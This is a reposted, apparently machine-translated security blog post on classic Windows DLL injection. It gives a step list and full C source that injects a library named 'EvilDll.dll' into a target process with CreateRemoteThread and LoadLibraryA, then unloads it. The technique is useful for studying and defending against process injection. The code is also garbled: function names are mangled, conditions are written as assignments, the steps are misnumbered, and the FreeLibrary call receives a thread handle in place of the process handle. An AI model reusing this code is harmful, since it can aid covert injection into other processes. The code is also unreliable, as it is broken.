Dll injection classic method full version

Pnig0s1992: a review of the most typical textbook Dll injection.

Summarize the basic injection process, including injection and uninstallation.

Inject Dll:

1. OpenProcess obtains the handle of the process to be injected.

2. VirtualAllocEx creates a memory segment in a remote process. The length is strlen (dllname) + 1;

3. WriteProcessMemory writes the Dll name to the memory opened in step 2.

4. CreateRemoteThread uses LoadLibraryA as the thread function. The parameter is the Dll name and a new thread is created.

5. CloseHandle closes the thread handle

Uninstall Dll:

1. CreateRemoteThread injects GetModuleHandle into a remote process. The parameter is the injected Dll name.

2. GetExitCodeThread uses the exit code of the thread as the handle value of the Dll module.

3. CloseHandle closes the thread handle

3. CreateRemoteThread injects FreeLibraryA into a remote process. The parameter is the handle value obtained in step 2.

4. WaitForSingleObject waits for the object handle to return

5. CloseHandle closes the thread and process handle.

 
 

  
  
// Code By Pnig0s1992
  
  
// Date: Maid, 13
  
  
# Include <stdio. h>
  
  
# Include <Windows. h>
  
  
# Include <TlHelp32.h>
  
  
 
  
  
 
  
  
DWORD getProcessHandle (LPCTSTR lpProcessName) // query the process PID based on the process name
  
  
{
  
  
DWORD dwRet = 0;
  
  
HANDLE hSnapShot = createconlhelp32snapshot (TH32CS_SNAPPROCESS, 0 );
  
  
If (hSnapShot = INVALID_HANDLE_VALUE)
  
  
{
  
  
Printf ("\ n failed to get process snapshot % d", GetLastError ());
  
  
Return dwRet;
  
  
}
  
  
 
  
  
PROCESSENTRY32 pe32; // declare the process entry object
  
  
Pe32.dwSize = sizeof (PROCESSENTRY32); // fill in the size of the Process entry object
  
  
Process32First (hSnapShot, & pe32); // traverses the Process List
  
  
Do
  
  
{
  
  
If (! Lstrcmp (pe32.szExeFile, lpProcessName) // find the PID of the specified process name
  
  
{
  
  
DwRet = pe32.th32ProcessID;
  
  
Break;
  
  
}
  
  
} While (Process32Next (hSnapShot, & pe32 ));
  
  
CloseHandle (hSnapShot );
  
  
Return dwRet; // return
  
  
}
  
  
 
  
  
INT main (INT argc, CHAR * argv [])
  
  
{
  
  
DWORD dwPid = getProcessHandle (LPCTSTR) argv [1]);
  
  
LPCSTR lpDllName = "EvilDll. dll ";
  
  
HANDLE hProcess = OpenProcess (PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwPid );
  
  
If (hProcess = NULL)
  
  
{
  
  
Printf ("\ n error in obtaining Process Handle % d", GetLastError ());
  
  
Return-1;
  
  
}
  
  
DWORD dwSize = strlen (lpDllName) + 1;
  
  
DWORD dwHasWrite;
  
  
LPVOID lpRemoteBuf = VirtualAllocEx (hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE );
  
  
If (WriteProcessMemory (hProcess, lpRemoteBuf, lpDllName, dwSize, & dwHasWrite ))
  
  
{
  
  
If (dwHasWrite! = DwSize)
  
  
{
  
  
VirtualFreeEx (hProcess, lpRemoteBuf, dwSize, MEM_COMMIT );
  
  
CloseHandle (hProcess );
  
  
Return-1;
  
  
}
  
  
 
  
  
} Else
  
  
{
  
  
Printf ("\ n error in writing remote process memory space % d. ", GetLastError ());
  
  
CloseHandle (hProcess );
  
  
Return-1;
  
  
}
  
  
 
  
  
DWORD dwNewThreadId;
  
  
LPVOID lpLoadDll = LoadLibraryA;
  
  
HANDLE hNewRemoteThread = CreateRemoteThread (hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) lpLoadDll, lpRemoteBuf, 0, & dwNewThreadId );
  
  
If (hNewRemoteThread = NULL)
  
  
{
  
  
Printf ("\ n failed to establish remote thread % d", GetLastError ());
  
  
CloseHandle (hProcess );
  
  
Return-1;
  
  
}
  
  
 
  
  
WaitForSingleObject (hNewRemoteThread, INFINITE );
  
  
CloseHandle (hNewRemoteThread );
  
  
 
  
  
// Prepare to uninstall the injected Dll
  
  
DWORD dwHandle, dwID;
  
  
LPVOID pFunc = GetModuleHandleA; // obtain the handle of the Dll injected in the remote thread
  
  
HANDLE hThread = CreateRemoteThread (hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) pFunc, lpRemoteBuf, 0, & dwID );
  
  
WaitForSingleObject (hThread, INFINITE );
  
  
GetExitCodeThread (hThread, & dwHandle); // The end code of the thread is the handle of the Dll module.
  
  
CloseHandle (hThread );
  
  
PFunc = FreeLibrary;
  
  
HThread = CreateRemoteThread (hThread, NULL, 0, (LPTHREAD_START_ROUTINE) pFunc, (LPVOID) dwHandle, 0, & dwID); // inject FreeLibraryA into a remote thread to uninstall the Dll.
  
  
WaitForSingleObject (hThread, INFINITE );
  
  
CloseHandle (hThread );
  
  
CloseHandle (hProcess );
  
  
Return 0;
  
  
}
 
 

 

This article is from the "About: Blank H4cking" blog, please be sure to keep this source http://pnig0s1992.blog.51cto.com/393390/804484